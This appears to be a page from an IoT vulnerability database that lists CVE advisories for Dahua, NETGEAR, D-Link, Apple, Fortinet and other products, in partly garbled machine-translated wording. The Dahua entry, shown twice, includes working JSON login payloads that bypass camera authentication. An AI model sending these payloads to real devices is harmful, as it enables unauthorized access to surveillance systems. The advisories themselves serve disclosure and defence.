VARIoT IoT vulnerabilities database

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX] Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure -=[NetKeyboard Vulnerability]=- CVE-2021-33044 Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 } -=[Loopback Vulnerability]=- CVE-2021-33045 Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 } Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 } [ETX]

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX] Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure -=[NetKeyboard Vulnerability]=- CVE-2021-33044 Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 } -=[Loopback Vulnerability]=- CVE-2021-33045 Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 } Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 } [ETX]

Certain NETGEAR smart switches are affected by an authentication hijacking race-condition vulnerability by an unauthenticated attacker who uses the same source IP address as an admin in the process of logging in (e.g., behind the same NAT device, or already in possession of a foothold on an admin's machine). This occurs because the multi-step HTTP authentication process is effectively tied only to the source IP address. This affects GC108P before 1.0.8.2, GC108PP before 1.0.8.2, GS108Tv3 before 7.0.7.2, GS110TPP before 7.0.7.2, GS110TPv3 before 7.0.7.2, GS110TUP before 1.0.5.3, GS308T before 1.0.3.2, GS310TP before 1.0.3.2, GS710TUP before 1.0.5.3, GS716TP before 1.0.4.2, GS716TPP before 1.0.4.2, GS724TPP before 2.0.6.3, GS724TPv2 before 2.0.6.3, GS728TPPv2 before 6.0.8.2, GS728TPv2 before 6.0.8.2, GS750E before 1.0.1.10, GS752TPP before 6.0.8.2, GS752TPv2 before 6.0.8.2, MS510TXM before 1.0.4.2, and MS510TXUP before 1.0.4.2. plural NETGEAR Smart Switch contains an authentication vulnerability and a race condition vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This affects GC108P prior to 1.0.8.2, GC108PP prior to 1.0.8.2, GS108Tv3 prior to 7.0.7.2, GS110TPP prior to 7.0.7.2, GS110TPv3 prior to 7.0.7.2, GS110TUP prior to 1.0.5.3, GS308T prior to 1.0.3.2, GS310TP prior to 1.0.3.2, GS710TUP prior to 1.0.5.3, GS716TP prior to 1.0.4.2, GS716TPP prior to 1.0.4.2, GS724TPP prior to 2.0.6.3, GS724TPv2 prior to 2.0.6.3, GS728TPPv2 prior to 6.0.8.2, GS728TPv2 prior to 6.0.8.2, GS750E prior to 1.0.1.10, GS752TPP prior to 6.0.8.2, GS752TPv2 prior to 6.0.8.2, MS510TXM prior to 1.0.4.2, and MS510TXUP prior to 1.0.4.2

Certain NETGEAR smart switches are affected by a remote admin password change by an unauthenticated attacker via the (disabled by default) /sqfs/bin/sccd daemon, which fails to check authentication when the authentication TLV is missing from a received NSDP packet. This affects GC108P before 1.0.8.2, GC108PP before 1.0.8.2, GS108Tv3 before 7.0.7.2, GS110TPP before 7.0.7.2, GS110TPv3 before 7.0.7.2, GS110TUP before 1.0.5.3, GS308T before 1.0.3.2, GS310TP before 1.0.3.2, GS710TUP before 1.0.5.3, GS716TP before 1.0.4.2, GS716TPP before 1.0.4.2, GS724TPP before 2.0.6.3, GS724TPv2 before 2.0.6.3, GS728TPPv2 before 6.0.8.2, GS728TPv2 before 6.0.8.2, GS750E before 1.0.1.10, GS752TPP before 6.0.8.2, GS752TPv2 before 6.0.8.2, MS510TXM before 1.0.4.2, and MS510TXUP before 1.0.4.2. plural NETGEAR Smart Switch contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. GC108P and other American Netgear (Netgear) company's intelligent switch products. This affects GC108P prior to 1.0.8.2, GC108PP prior to 1.0.8.2, GS108Tv3 prior to 7.0.7.2, GS110TPP prior to 7.0.7.2, GS110TPv3 prior to 7.0.7.2, GS110TUP prior to 1.0.5.3, GS308T prior to 1.0.3.2, GS310TP prior to 1.0.3.2, GS710TUP prior to 1.0.5.3, GS716TP prior to 1.0.4.2, GS716TPP prior to 1.0.4.2, GS724TPP prior to 2.0.6.3, GS724TPv2 prior to 2.0.6.3, GS728TPPv2 prior to 6.0.8.2, GS728TPv2 prior to 6.0.8.2, GS750E prior to 1.0.1.10, GS752TPP prior to 6.0.8.2, GS752TPv2 prior to 6.0.8.2, MS510TXM prior to 1.0.4.2, and MS510TXUP prior to 1.0.4.2

The WooCommerce Payment Gateway Per Category WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/includes/plugin_settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.10. WordPress is a blogging platform developed by the Wordpress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. A WordPress plugin is an open source application plugin for WordPress

D-Link DSL-3782 EU v1.01:EU v1.03 is affected by a buffer overflow which can cause a denial of service. This vulnerability exists in the web interface "/cgi-bin/New_GUI/Igmp.asp". Authenticated remote attackers can trigger this vulnerability by sending a long string in parameter 'igmpsnoopEnable' via an HTTP request. D-Link DSL-3782 Exists in a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. D-Link DSL-3782 is a wireless router made by D-Link in Taiwan. The vulnerability is caused by the incorrect operation when performing operations on the memory in the WEB interface/cgi-bin/New_GUI/Igmp.asp Verify the data boundary

An improper input validation vulnerability in libsapeextractor library prior to SMR Sep-2021 Release 1 allows attackers to execute arbitrary code in mediaextractor process. Android Exists in a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Samsung libsapeextractor is a component of Samsung mobile devices. Samsung libsapeextractor has an input validation error vulnerability, which is caused by incorrect input validation logic in the libsapeextractor library

An issue existed with authenticating the action triggered by an NFC tag. The issue was addressed with improved action authentication. This issue is fixed in iOS 14.5 and iPadOS 14.5. A person with physical access to an iOS device may be able to place phone calls to any phone number. iOS and iPadOS There is an authentication vulnerability in.Information may be tampered with

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing a maliciously crafted file may lead to arbitrary code execution. plural Apple The product contains a vulnerability related to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

Description: A person with physical access may be able to access contacts. This issue is fixed in iOS 14.5 and iPadOS 14.5. Impact: An issue with Siri search access to information was addressed with improved logic

A Hidden Functionality in Fortinet FortiOS 7.x before 7.0.1, FortiOS 6.4.x before 6.4.7 allows attacker to Execute unauthorized code or commands via specific hex read/write operations. Fortinet FortiOS Exists in unspecified vulnerabilities.Information may be obtained and information may be tampered with. Fortinet FortiOS is a set of security operating system dedicated to the FortiGate network security platform developed by Fortinet. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSLVPN, Web content filtering and anti-spam. Fortinet FortiOS has a security vulnerability in which the FortiOS CLI could allow local and authenticated users to be assigned to specific VDOMs to retrieve information from other VDOMs. An attacker could exploit this vulnerability to expose sensitive information to unauthorized actors

This issue was addressed with improved file handling. This issue is fixed in Apple TV app for Fire OS 6.1.0.6A142:7.1.0. An attacker with file system access may modify scripts used by the app

A vulnerability in Base Software for SoftControl allows an attacker to insert and run arbitrary code in a computer running the affected product. This issue affects: . Base Software There is an input validation vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ABB Base Software is a basic software of Swiss ABB company

This issue was addressed with improved checks. This issue is fixed in iOS 14.5 and iPadOS 14.5. An application may be able to gain elevated privileges. iOS and iPadOS Exists in unspecified vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

A stack-based buffer overflow in Fortinet FortiWeb version 6.3.14 and below, 6.2.4 and below allows attacker to execute unauthorized code or commands via crafted parameters in CLI command execution. Fortinet FortiWeb Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content. FortiWeb has a buffer error vulnerability that stems from multiple stack-based buffer overflow vulnerabilities in the FortiWeb CLI interface

A Improper neutralization of special elements used in a command ('Command Injection') in Fortinet FortiWeb version 6.3.13 and below allows attacker to execute unauthorized code or commands via crafted HTTP requests. Fortinet FortiWeb for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content. FortiWeb has a buffer error vulnerability that stems from multiple stack-based buffer overflow vulnerabilities in the FortiWeb CLI interface

The issue was addressed with improved permissions logic. This issue is fixed in macOS Big Sur 11.3. A malicious application may be able to access the user's recent contacts. macOS There is a vulnerability in improper default permissions.Information may be obtained

This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.4. A malicious application may be able to bypass certain Privacy preferences. macOS Exists in unspecified vulnerabilities.Information may be tampered with

A buffer overflow may result in arbitrary code execution. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. A logic issue was addressed with improved state management. plural Apple The product contains a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. macOS Big Sur versions prior to 11.3, iOS versions prior to 14.5 and iPadOS versions prior to 14.5, watchOS versions prior to 7.4, and tvOS versions prior to 14.5 have a security vulnerability due to a buffer overflow that may lead to arbitrary code execution

A logic issue was addressed with improved validation. This issue is fixed in iOS 14.5 and iPadOS 14.5. A malicious application may be able to execute arbitrary code with system privileges. iOS and iPadOS Exists in unspecified vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Both Apple iOS and Apple iPadOS are products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple iPadOS is an operating system for iPad tablets